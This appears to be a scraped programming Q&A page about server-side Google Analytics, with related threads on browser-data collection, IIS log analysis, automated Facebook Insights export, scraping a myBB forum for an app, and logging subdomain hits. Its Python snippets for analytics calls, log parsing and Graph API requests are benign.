Is it possible to use Google Analytics on the server side? We are quite familiar with using Google Analytics for the client side of things, but we find ourselves needing to keep track of server events as well. Where should we go for this? Ideally we want to make simple calls that help us track session lengths, frequencies, trends, etc.
I'm not looking for software that analyzes and parses my log files. The Apache log files are not sufficient; we need to know about specific events inside each page.
Google Code contains this tool (if you're using PHP 5.2+):
http://code.google.com/p/serversidegoogleanalytics/
Other than that, there was a similar question asked here:
https://stackoverflow.com/questions/287260/are-there-any-free-and-open-source-server-side-analytics-engines
This project looks good too: http://code.google.com/p/php-ga/
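For completeness: Google also documents an HTTP interface for exactly this use case, the Measurement Protocol, which lets any server-side code send hits directly. Here is a minimal sketch in Python; the tracking ID and client ID are placeholders, and the parameter names are per the Universal Analytics spec:

```python
# Minimal sketch: send a server-side event hit to Google Analytics
# via the Measurement Protocol. UA-XXXXX-Y and the client ID are
# placeholders -- substitute your own property ID and a stable
# per-user identifier so sessions can be stitched together.
import requests

def track_event(category, action, label=None, client_id="555"):
    payload = {
        "v": "1",             # protocol version
        "tid": "UA-XXXXX-Y",  # your GA property ID (placeholder)
        "cid": client_id,     # anonymous client ID (drives sessions)
        "t": "event",         # hit type
        "ec": category,       # event category
        "ea": action,         # event action
    }
    if label:
        payload["el"] = label
    requests.post("https://www.google-analytics.com/collect",
                  data=payload, timeout=5)

track_event("billing", "invoice-generated", label="monthly")
```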
Related
I am tasked with the development of a web page.
As part of this, I also need to collect details of the browser used by each user to browse the page (along with version, timestamp, and IP address).
I tried searching the internet, but maybe my search was not properly directed.
I am not sure how to go about this.
Any pointers to get me started would help me a long way.
I would also like to know how to store the information thus collected.
Not sure if this is a good idea, but just thinking out loud: is there any online service/channel available where the data can be uploaded in real time, like ThingSpeak?
Thanks
Google Analytics is great, but it doesn't give you the raw data (for free). So if you want your data in, e.g., SQL format, I suggest you use a tool that collects the data for you and then sends it on to Google Analytics.
We use Segment (segment.io, but there are probably other tools out there too) for this; they have a free plan. You will need to create a warehouse in AWS, and all your data will be stored there, including details of the browser (version, timestamp, IP).
Disclaimer: I do not work for Segment, but I am a customer.
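For reference, recording an event through Segment's server-side Python library looks roughly like this; the write key, user ID, and property values are placeholders:

```python
# Rough sketch using Segment's server-side Python library
# (pip install analytics-python). The write key, user ID, and
# property values below are placeholders.
import analytics

analytics.write_key = "YOUR_SEGMENT_WRITE_KEY"

# One call per event; Segment forwards it to whatever destinations
# you have configured (Google Analytics, a warehouse, etc.).
analytics.track(
    user_id="user-123",
    event="Page Viewed",
    properties={
        "browser": "Firefox 118",  # e.g. parsed from the User-Agent header
        "ip": "203.0.113.7",       # request IP (placeholder)
        "viewed_at": "2023-10-05T12:00:00Z",
    },
)
analytics.flush()  # drain the internal queue before the process exits
```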
Enable Google Analytics on your website, then after a week take a look at the Google Analytics page to see the data that was collected.
Follow the guide here to configure Google Analytics on your website: https://support.google.com/analytics/answer/1008080?hl=en
You should go for alternatives like Segment (https://segment.com/), Mixpanel (https://mixpanel.com/), and similar services. They can guarantee consistency for your data and also integrate with many different analytics tools and platforms.
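If you go the Mixpanel route, a server-side call is similarly small. A rough sketch, assuming the official mixpanel Python package; the project token and distinct ID are placeholders:

```python
# Rough sketch using the official mixpanel Python library
# (pip install mixpanel). The project token and distinct_id
# are placeholders.
from mixpanel import Mixpanel

mp = Mixpanel("YOUR_PROJECT_TOKEN")

# Track a server-side event with the browser details the
# question asks about attached as properties.
mp.track("user-123", "Page Viewed", {
    "browser": "Chrome 117",
    "ip": "198.51.100.4",
})
```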
Note: there are a few similar questions already asked here, but they are from 2009. Maybe something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question: what is the best tool to view issues with a website based on IIS logs (e.g. 404s, 500 responses, long page processing times), ideally with grouping/sorting options? I do not want to spend a lot of time on this; I just want to periodically check that all is good with the website.
Second question (and I know I'm most likely asking for too much): is there any way to expose the processed logs to the web, so I can review the things mentioned above without RDPing into the server?
Ideally I'm looking for a free/open-source solution, but I'm ready to pay for good software as well (just not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates set up for IIS, and we can consolidate the logs in a database with web access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also set up real-time alerts, so that you get an email when a critical error, like a 500, is encountered in a log file.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug in command-line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can set up comprehensive monitoring with a single product.
I'd look into @LuckyLuke's solution (or something similar): the classic "build vs. buy" decision. Based on your post, this isn't going to be your full-time job, so IMHO it's best to leave it to those for whom it is...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own Log Parser and, depending on how far you want to go with it, use it (via its COM DLL) to write your "admin web pages" in .NET/ASP.NET and host them on each of your servers...
If you only want to be alerted about very specific errors, another "hacky" approach is to provide your own custom error pages (either replacing the default IIS error pages, or configuring your ASP.NET apps to use specific error pages).
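And if you do end up tinkering, a first pass over W3C-format IIS logs doesn't need much code. A rough sketch in Python, assuming the default W3C extended format with a #Fields: header line; the log path is a placeholder:

```python
# Rough sketch: scan W3C-format IIS logs and count error responses
# (404, 500, ...) grouped by URL. Assumes the default W3C extended
# log format with a "#Fields:" header line; the path is a placeholder.
from collections import Counter
import glob

errors = Counter()
for path in glob.glob(r"C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"):
    fields = []
    with open(path, errors="replace") as f:
        for line in f:
            if line.startswith("#Fields:"):
                fields = line.split()[1:]  # column names for data rows
            elif not line.startswith("#") and fields:
                row = dict(zip(fields, line.split()))
                status = row.get("sc-status", "")
                if status.startswith(("4", "5")):
                    errors[(status, row.get("cs-uri-stem", "?"))] += 1

# Top offenders, sorted by frequency
for (status, url), count in errors.most_common(20):
    print(f"{count:6d}  {status}  {url}")
```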
I'm looking for a way of programmatically exporting Facebook insights data for my pages, in a way that I can automate it. Specifically, I'd like to create a scheduled task that runs daily, and that can save a CSV or Excel file of a page's insights data using a Facebook API. I would then have an ETL job that puts that data into a database.
I checked out the OData service for Excel, which appears to be broken. Does anyone know of a way to programmatically automate the export of Insights data for Facebook pages?
It's possible and not too complicated once you know how to access the insights.
Here is how I proceed:
Log the user in with the offline_access and read_insights permissions.
read_insights allows me to access the insights for all the pages and applications the user is admin of.
offline_access gives me a permanent token that I can use to update the insights without having to wait for the user to login.
Retrieve the list of pages and applications the user is an admin of, and store those in the database.
When I want to get the insights for a page or application, I don't query FQL; I query the Graph API. First I calculate how many queries to graph.facebook.com/[object_id]/insights are necessary for the chosen date range. Then I generate a query to use with the Batch API (http://developers.facebook.com/docs/reference/api/batch/). That allows me to get all the data for all the available insights, for all the days in the date range, in only one request (see the sketch after these steps).
I parse the rather huge JSON object obtained (it weighs a few MB, be aware of that) and store everything in the database.
Now that you have all the insights parsed and stored in a database, you're just a few SQL queries away from manipulating the data the way you want, like displaying charts or exporting in CSV or Excel format.
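As promised above, a rough sketch of such a batch call in Python; the access token, page ID, and date parameters are placeholders, and the exact Graph API parameters have changed over time:

```python
# Rough sketch of the batch approach described above: bundle several
# /insights requests into one call to the Graph API Batch endpoint.
# The access token, page ID, and date parameters are placeholders.
import json
import requests

ACCESS_TOKEN = "LONG_LIVED_PAGE_TOKEN"
PAGE_ID = "1234567890"

batch = [
    {"method": "GET",
     "relative_url": f"{PAGE_ID}/insights?since=2013-01-01&until=2013-01-31"},
    {"method": "GET",
     "relative_url": f"{PAGE_ID}/insights?since=2013-02-01&until=2013-02-28"},
]

resp = requests.post(
    "https://graph.facebook.com",
    data={"access_token": ACCESS_TOKEN, "batch": json.dumps(batch)},
)

# Each element of the response corresponds to one batched request;
# its "body" is itself a JSON string that needs a second parse.
for item in resp.json():
    data = json.loads(item["body"])
    # ... store data["data"] in your database here
```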
I have the code already written (and published as a temporarily free tool on www.social-insights.net), so exporting to Excel would be quite fast and easy.
Let me know if I can help you with that.
It could be done before the weekend.
You would need to write something that uses the Insights part of the Facebook Graph API. I haven't seen anything already written for this.
Check out http://megalytic.com. This is a service that exports FB Insights (along with Google Analytics, Twitter, and some others) to Excel.
A new tool is available: the Analytics Edge add-ins now have a Facebook connector that makes downloads a snap.
http://www.analyticsedge.com/facebook-connector/
There are a number of ways that you could do this. I would suggest your choice depends on two factors:
1. What is your level of coding skill?
2. How much data are you looking to move?
I can't answer #1 for you, but in your case you aren't moving that much data (in relative terms). I will still share three of many options.
HARD CODE IT
This would require a script that accesses Facebook's Graph API, AND a computer/server to run that request automatically. I primarily use AWS and would suggest launching an EC2 instance scheduled to run your script at set times. I haven't used AWS Data Pipeline, but I do know it is designed so it can run a script automatically as well... supposedly with a little less server know-how. (A rough sketch of such a script follows.)
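As a feel for this option, here is a rough sketch of a script suitable for a daily cron job or scheduled task, dumping one day of page insights to CSV for a downstream ETL job. The token, page ID, and the response fields assumed here are placeholders based on how page insights have historically been returned:

```python
# Rough sketch of the "hard code it" option: run daily from cron or
# a scheduled task, writing one day of page insights to CSV. Token,
# page ID, and assumed response fields are placeholders.
import csv
import datetime
import requests

ACCESS_TOKEN = "LONG_LIVED_PAGE_TOKEN"
PAGE_ID = "1234567890"

today = datetime.date.today()
since = today - datetime.timedelta(days=1)
resp = requests.get(
    f"https://graph.facebook.com/{PAGE_ID}/insights",
    params={"access_token": ACCESS_TOKEN,
            "since": str(since), "until": str(today)},
)

with open(f"insights-{since}.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["metric", "period", "end_time", "value"])
    for metric in resp.json().get("data", []):
        for point in metric.get("values", []):
            writer.writerow([metric["name"], metric["period"],
                             point.get("end_time"), point.get("value")])
```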
USE THIRD PARTY ADD-ON
There are a lot of people with similar data needs, which has led to a number of easy-to-use tools. I use Supermetrics Free to run occasional audits and make sure that our tools are running properly. Supermetrics is fast and has a really easy interface for accessing Facebook's APIs and several others. I believe you can also schedule refreshes and updates with it.
USE THIRD PARTY FULL-SERVICE ETL
There are also several services and freelancers that can set this up for you with little to no work on your own, depending on where you want the data. Stitch is a service I have worked with for FB ads. There might be better services, but it has fulfilled our needs so far.
MY SUGGESTION
You would probably be best served by using a third-party add-on like Supermetrics. It's fast and easy to use. The other methods might be more worth looking into if you had a lot more data to move, or needed it to be refreshed more often than daily.
I would like to create an app for a myBB forum, so the forum will look nicer and much cleaner on an iPhone or Android.
Is it possible without an API? It isn't my site either.
Everything is possible; it's just a matter of resources...
Technically, you can write an app for anything on the web, but:
an API will tell you how you can do things with the site, without having to reverse engineer all pages/posts/... and the format of every output resulting from POST/GET operations. Reverse engineering may take a long time, and you will surely not come across all possible results (error pages, bad authentication, ...);
an API is quite stable and is always updated with great care by the developers so as not to break existing applications. Without an API, there is no guarantee that your app will not break with the next release of the forum when it is upgraded;
a web API generally defines an output format which is easily parseable: many APIs output XML or JSON, which can be processed with standard libraries. Without an API, the output format is plain HTML, which may be difficult to reorganize in order to present the results in a different form.
So, yes, you can definitely write an app for a myBB forum, but it may require a fair amount of work.
You can; it's called screen scraping, and it's what was done before XML, the semantic web, SOAP, web services, and then JSON APIs tried to solve the problem better.
In screen scraping, you grab the site's HTML, parse it, extract the data you want, then do what you need with that data. It's more work, and it breaks each time the site's layout changes; hence the history of improvements to it.
You mention the site in question is not yours. Many sites do not regard screen scraping as fair use, so check with the site's terms and conditions that you can legally create an app from the data posted there.
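If the terms do allow it, a minimal screen-scraping sketch in Python looks like this; the URL and the CSS selector are guesses about one particular myBB theme's markup and will need adjusting:

```python
# Minimal screen-scraping sketch: fetch a forum index page and pull
# out thread titles. The URL and CSS selector are assumptions about
# one particular myBB theme's markup -- inspect the real HTML and
# adjust. This is the part that breaks when the site's layout changes.
import requests
from bs4 import BeautifulSoup

html = requests.get("https://example-forum.com/forumdisplay.php?fid=2").text
soup = BeautifulSoup(html, "html.parser")

# myBB themes commonly mark thread links with "subject_new" /
# "subject_old" spans -- treat this selector as a guess, not a spec.
for link in soup.select("span.subject_new a, span.subject_old a"):
    print(link.get_text(strip=True), "->", link.get("href"))
```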
You could consider using HTML5... do you think that would be doable for your app?
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file request event and its properties.
@Wyatt Barnette: I've thought of this! But how do I set those properties so that it collects them all? I'm writing my own log-parsing software, as I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out Microsoft's Log Parser tool for IIS. That should at least take care of the more onerous part of the task (actually making sense of the log files). From there it is a pretty straightforward reporting operation.
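If you'd rather script it yourself: once you enable the Host (cs-host) field in the site's W3C logging options, a short script can split a single site's log by subdomain. A rough sketch in Python; the log path is a placeholder:

```python
# Rough sketch: once the Host (cs-host) field is enabled in the W3C
# logging options, subdomain traffic can be split out of a single
# IIS site's logs. The log path is a placeholder.
from collections import Counter
import glob

hits = Counter()
for path in glob.glob(r"C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"):
    fields = []
    with open(path, errors="replace") as f:
        for line in f:
            if line.startswith("#Fields:"):
                fields = line.split()[1:]  # column names for data rows
            elif not line.startswith("#") and fields:
                row = dict(zip(fields, line.split()))
                hits[row.get("cs-host", "unknown")] += 1

# Hits per subdomain, most active first
for host, count in hits.most_common():
    print(f"{count:8d}  {host}")
```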